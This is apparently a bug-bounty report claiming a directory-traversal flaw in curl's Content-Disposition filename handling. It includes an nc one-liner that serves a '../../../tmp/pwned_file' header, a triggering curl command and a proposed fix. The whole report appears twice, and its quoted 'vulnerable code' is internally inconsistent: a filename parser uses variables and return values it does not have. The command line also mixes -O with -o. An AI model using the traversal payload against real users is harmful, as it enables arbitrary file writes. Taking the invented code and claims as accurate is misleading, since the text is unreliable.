Description
Vulnerability Description
The parse_filename function in src/tool_cb_hdr.c does not adequately validate and sanitize filenames extracted from HTTP Content-Disposition headers, allowing directory traversal attacks when the -O (remote-name) and -J (remote-header-name) options are used together.
Vulnerable Code Location
File: src/tool_cb_hdr.c
Function: parse_filename (lines ~230-300)
Affected Code Path:
static char *parse_filename(const char *ptr, size_t len)
{
// ... [filename extraction logic] ...
if(per->config->output_dir) {
outs->filename = curl_maprintf("%s/%s", per->config->output_dir,
filename); // VULNERABLE: filename may contain path traversal
}
else
outs->filename = filename;
// File is created without adequate path traversal checks
if(!tool_create_output_file(outs, per->config))
return CURL_WRITEFUNC_ERROR;
}
Attack Scenario
1 . User runs: curl -O -J http://malicious-server/file -o "/intended/output/dir"
2. Malicious server responds with header: Content-Disposition: attachment; filename="../../../etc/passwd"
3. cURL creates file at /etc/passwd instead of /intended/output/dir/etc/passwd
Proof of Concept
Malicious Server Setup:
# Create a simple HTTP server that returns malicious Content-Disposition header
echo -e "HTTP/1.1 200 OK\r\nContent-Disposition: attachment; filename=\"../../../tmp/pwned_file\"\r\nContent-Length: 6\r\n\r\nPWNED" | nc -l -p 8080
Exploit Command:
# User command that triggers the vulnerability
curl -O -J http://localhost:8080/malicious-file -o "/safe/output/directory"
# Result: File created at /tmp/pwned_file instead of /safe/output/directory/pwned_file
Recommended Fix:
static char *parse_filename(const char *ptr, size_t len)
{
char *copy = memdup0(ptr, len);
if(!copy)
return NULL;
// Path traversal protection
if(strstr(copy, "..") != NULL) {
free(copy);
return NULL; // Reject filenames with path traversal
}
// Additional sanitization for absolute paths
if(copy[0] == '/') {
free(copy);
return NULL; // Reject absolute paths
}
// ... existing processing logic ...
}
## Impact
Direct Impact
Arbitrary File Write: Attackers can write files outside the intended output directory
File Overwrite: Existing system files can be overwritten
Privilege Escalation: When run with elevated privileges, can modify critical system files
Attack Vectors
Malicious Web Servers: Any compromised or malicious server can exploit this
Man-in-the-Middle Attacks: In unencrypted connections
Cache Poisoning: If CDN or proxy caches are compromised
The parse_filename function in src/tool_cb_hdr.c does not adequately validate and sanitize filenames extracted from HTTP Content-Disposition headers, allowing directory traversal attacks when the -O (remote-name) and -J (remote-header-name) options are used together.
Vulnerable Code Location
File: src/tool_cb_hdr.c
Function: parse_filename (lines ~230-300)
Affected Code Path:
static char *parse_filename(const char *ptr, size_t len)
{
// ... [filename extraction logic] ...
if(per->config->output_dir) {
outs->filename = curl_maprintf("%s/%s", per->config->output_dir,
filename); // VULNERABLE: filename may contain path traversal
}
else
outs->filename = filename;
// File is created without adequate path traversal checks
if(!tool_create_output_file(outs, per->config))
return CURL_WRITEFUNC_ERROR;
}
Attack Scenario
1 . User runs: curl -O -J http://malicious-server/file -o "/intended/output/dir"
2. Malicious server responds with header: Content-Disposition: attachment; filename="../../../etc/passwd"
3. cURL creates file at /etc/passwd instead of /intended/output/dir/etc/passwd
Proof of Concept
Malicious Server Setup:
# Create a simple HTTP server that returns malicious Content-Disposition header
echo -e "HTTP/1.1 200 OK\r\nContent-Disposition: attachment; filename=\"../../../tmp/pwned_file\"\r\nContent-Length: 6\r\n\r\nPWNED" | nc -l -p 8080
Exploit Command:
# User command that triggers the vulnerability
curl -O -J http://localhost:8080/malicious-file -o "/safe/output/directory"
# Result: File created at /tmp/pwned_file instead of /safe/output/directory/pwned_file
Recommended Fix:
static char *parse_filename(const char *ptr, size_t len)
{
char *copy = memdup0(ptr, len);
if(!copy)
return NULL;
// Path traversal protection
if(strstr(copy, "..") != NULL) {
free(copy);
return NULL; // Reject filenames with path traversal
}
// Additional sanitization for absolute paths
if(copy[0] == '/') {
free(copy);
return NULL; // Reject absolute paths
}
// ... existing processing logic ...
}
## Impact
Direct Impact
Arbitrary File Write: Attackers can write files outside the intended output directory
File Overwrite: Existing system files can be overwritten
Privilege Escalation: When run with elevated privileges, can modify critical system files
Attack Vectors
Malicious Web Servers: Any compromised or malicious server can exploit this
Man-in-the-Middle Attacks: In unencrypted connections
Cache Poisoning: If CDN or proxy caches are compromised
Basic Information
ID
H1:3408126
Published
Nov 1, 2025 at 20:40
Modified
Nov 1, 2025 at 21:22